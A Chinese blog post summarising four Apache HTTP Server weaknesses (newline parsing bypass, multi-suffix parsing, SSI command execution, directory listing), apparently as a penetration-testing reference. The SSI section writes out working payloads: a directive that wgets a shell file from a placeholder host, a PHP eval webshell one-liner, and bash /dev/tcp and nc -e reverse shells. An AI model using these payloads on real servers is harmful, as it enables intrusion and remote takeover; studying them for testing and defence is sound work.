• apache漏洞汇总


    ID

    技术描述

    利用场景/条件

    过程

    参考

    武器库关联

    S1 Apache换行解析漏洞

    Apache 2.4.0~2.4.29

    Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0a将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

    利用方法:

    burp抓包,在Hex选项卡.php后面0d的位置右键-Insert byte,添加一个0a,然后发包,成功上传

    浏览器访问 /x.php%0A,正常解析

    https://www.cnblogs.com/leixiao-/p/10223090.html  
    S2 Apache多后缀解析漏洞 使用module模式与php结合的所有版本 apache存在未知扩展名解析漏洞,使用fastcig模式与php结合的所有版本apache不存在此漏洞。

    php本身可以解析: .php3 .php5 .pht .phtml 等等。。。。
    apache解析文件从后往前解析 例如:1.php.xxx.aaa 从aaa向前解析,遇到认识的后缀如php则交给php处理。
    apache : mime.typs 文件写了apache认识的后缀
    漏洞产生条件:
    1、apache使用module模式 :在httpd.conf中设置

    2、运维人员在配置服务器时,为了使Apache能够解析PHP,而自己添加了一个handler :AddHandler application/x-httpd-php .php
    window下路径:Apache\conf\extra\httpd-php.conf

    上传1.php.aaaa 访问1.php.aaaa 解析成功:

    https://blog.csdn.net/weixin_45427650/article/details/105202486  
    S3 Apache SSI远程命令执行漏洞

    影响版本:Apache全版本(支持SSI与CGI)

    漏洞原理
    SSI(server-side includes):是放置在HTML页面中的指令,它可以将动态生成的内容添加到现有的HTML页面,而不必通过CGI程序或其他动态技术来提供整个页面。以上是定义采用在Apache官网对SSI的定义,说白了就是可以在HTML中加入特定的指令,也可以引入其他的页面。开启SSI需要单独配置Apache,可以参考SSI配置。
    SSI可以完成查看时间、文件修改时间、CGI程序执行结果、执行系统命令、连接数据库等操作,功能非常强大。
    我们要利用的就是SSI执行系统命令的功能,正常的一个包含SSI指令的文件,可以如下内容:

    <pre>
    <!--#exec cmd="whoami" -->
    </pre>
    文件名保存为test.shtml,这个后缀取决于Apache的配置,默认是此后缀。
    当后台对扩展名校验不严格时,可以上传此类型文件,达到执行命令,获取webshell的目的。执行效果:


    上传webshell:

    <!--#exec cmd="wget http://xxx/shell.txt | rename shell.txt shell.php" -->
    echo '<?php @eval($_POST[margin]);?>' > shell.php
    反弹shell:

    <!--#exec cmd="/bin/bash -i > /dev/tcp/192.168.0.118/8888 0<&1 2>&1" -->
    <!--#exec cmd="nc x.x.x.x 8888 -e /bin/bash"-->

    https://zhuanlan.zhihu.com/p/125115734  
    S4 apache目录遍历

    在httpd.conf文件:

    Options + Indexes + FollowSymLinks + ExecCGI

    漏洞特征:intitle:index of

    在httpd.conf文件中找到 Options +Indexes +FollowSymLinks +ExecCGI 并修改成 Options -Indexes+FollowSymLinks +ExecCGI 并保存

    https://blog.csdn.net/weixin_45427650/article/details/105202486  
  • 相关阅读:
    day21继承
    day22
    面向对象
    常用模块
    模块
    迭代器
    【游记】2020-CSP
    【初赛解析】2021CSP-S初赛解析(不完全)
    【题解】AcWing 1390.通电围栏
    【题解】AcWing 1387.家的范围
  • 原文地址:https://www.cnblogs.com/1008612mrzou/p/15393643.html
Copyright © 2020-2023  润新知